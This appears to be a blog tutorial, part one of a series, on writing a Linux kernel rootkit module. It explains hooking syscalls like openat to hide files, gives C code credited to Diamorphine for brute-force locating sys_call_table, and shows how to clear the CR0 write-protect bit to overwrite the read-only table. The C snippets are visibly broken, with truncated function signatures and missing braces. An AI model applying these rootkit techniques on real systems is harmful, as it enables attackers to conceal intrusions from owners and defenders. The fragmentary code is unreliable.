Every technique used in this rootkit can be found from internet, I am NOT responsible for any damage you might cause using my code


what you will learn

  • what system calls are
  • how to hijack them

how to hook syscalls


to make the magic work, you have to deceive user space programs, meaning controlling the interface between user space and kernel, ie. syscalls

take cat for example, how does it open the target file for reading?

$ strace cat /tmp/test
execve("/usr/bin/cat", ["cat", "/tmp/test"], 0x7ffc0ef32218 /* 29 vars */) = 0
brk(NULL)                               = 0x5564de58a000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=41793, ...}) = 0
mmap(NULL, 41793, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fe15ceaf000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260A\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=1824496, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe15cead000
mmap(NULL, 1837056, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fe15ccec000
mprotect(0x7fe15cd0e000, 1658880, PROT_NONE) = 0
mmap(0x7fe15cd0e000, 1343488, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x22000) = 0x7fe15cd0e000
mmap(0x7fe15ce56000, 311296, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x16a000) = 0x7fe15ce56000
mmap(0x7fe15cea3000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1b6000) = 0x7fe15cea3000
mmap(0x7fe15cea9000, 14336, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fe15cea9000
close(3)                                = 0
arch_prctl(ARCH_SET_FS, 0x7fe15ceae540) = 0
mprotect(0x7fe15cea3000, 16384, PROT_READ) = 0
mprotect(0x5564de4d4000, 4096, PROT_READ) = 0
mprotect(0x7fe15cee1000, 4096, PROT_READ) = 0
munmap(0x7fe15ceaf000, 41793)           = 0
brk(NULL)                               = 0x5564de58a000
brk(0x5564de5ab000)                     = 0x5564de5ab000
openat(AT_FDCWD, "/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=3031632, ...}) = 0
mmap(NULL, 3031632, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fe15ca07000
close(3)                                = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0), ...}) = 0
openat(AT_FDCWD, "/tmp/test", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=5, ...}) = 0
fadvise64(3, 0, 0, POSIX_FADV_SEQUENTIAL) = 0
mmap(NULL, 139264, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe15c9e5000
read(3, "test\n", 131072)               = 5
write(1, "test\n", 5test
)                   = 5
read(3, "", 131072)                     = 0
munmap(0x7fe15c9e5000, 139264)          = 0
close(3)                                = 0
close(1)                                = 0
close(2)                                = 0
exit_group(0)                           = ?
+++ exited with 0 +++

the core part:

openat(AT_FDCWD, "/tmp/test", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=5, ...}) = 0
fadvise64(3, 0, 0, POSIX_FADV_SEQUENTIAL) = 0
mmap(NULL, 139264, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe15c9e5000
read(3, "test\n", 131072)               = 5
write(1, "test\n", 5test
)                   = 5

more specifically, its the openat syscall that helps cat get the target file. now we know if we hook openat, we can tell cat that this file doesnt exist, or give it Permission denied


redirecting a syscall to a custom function, is called hooking.

to do that, first we need to

find syscall table

basically its about replacing syscalls with your own functions, only in practice, you just modify the syscall table which holds addresses to all syscalls

when you have successfully made the target syscall to point to your custom function, all user space programs start to talk to your function instead of the real one

to do that, first we need to get the syscall table

unsigned long*
    unsigned long* syscall_table;
    unsigned long int i;

    for (i = (unsigned long int)sys_close; i < ULONG_MAX;
         i += sizeof(void*)) {
        syscall_table = (unsigned long*)i;

        if (syscall_table[__NR_close] == (unsigned long)sys_close)
            return syscall_table;
    return NULL;

the above code is borrowed from diamorphine

several notes to carry in mind:

  • a syscall function is of type long, meaning it can return a signed (negative) long int as errno
  • syscall_table[__NR_close] means syscall close of syscall_table array, in which __NR_close is the syscall number (index) of close
  • syscall table is an array of unsigned long, each element represents an address of the coresponding syscall

now i will explain what happens in the get_syscall_table_bf() function:

  1. we define a syscall_table to hold the actual syscall table that we get eventually
  2. sys_close represents the current close syscall's address, its the starting point we use to search
  3. loop until i reaches ULONG_MAX, ie. the max unsigned int number. in each loop, we use (unsigned long*)i as syscall_table (address), see if this syscall_table is valid, by checking if syscall_table[__NR_close] equals the actual close syscall
  4. return if we found the match

how does the search work?


$ sudo cat /boot/System.map-xxxx-generic | grep -e 'sys_call_table' -e 'sys_close'
ffffffff8125e8e0 T __ia32_sys_close
ffffffff8125ec70 T __x64_sys_close # `sys_close` address
ffffffff81c001e0 R sys_call_table # syscall table address
ffffffff81c015c0 R ia32_sys_call_table
ffffffff825985f0 t _eil_addr___ia32_sys_close
ffffffff82598600 t _eil_addr___x64_sys_close

we see that sys_call_table's address is greater than sys_close's, therefore by doing a search from sys_close to ULONG_MAX (the highest address possible), we are able to find sys_call_table

why close then? well, technically anything that resides lower than sys_call_table will do.

simple put, we just need to find some point to start from, as long as sys_call_table is in our search interval, we will find it without issue

note, syscall table is obtained at runtime, you will only need to compile the LKM once for the same kernel

when syscall table is located, our next move is

alter syscall table


one does not simply modify the syscall table, because ffffffff81c001e0 R sys_call_table has an R which implies its read-only

there are solutions, of course, please read this:

what is cr0 ?

theres a WP (write protect) bit in cr0 control register:

When set, the CPU can't write to read-only pages when privilege level is 0

level 0 is where your LKM code (the kernel) lives, so by setting the cr0's WP bit to "disabled" mode, we get the permission to ignore read-only

sounds really cool, but how do we do that?

static inline void

static inline void
    write_cr0(cr0 & ~0x00010000);

static int mod_init(void) {
    unsigned long cr0;
    cr0 = read_cr0();

    /* hook some syscalls */

    return 0;

AND with 0, we always get 0, thus WP bits gets disabled. we can OR it back of course, but since we have already read_cr0(), setting cr0 back is really easy

okay, i guess i have covered the kernel hooking part, in 0x02, im gonna hook some syscalls, to finish our LKM


comments powered by Disqus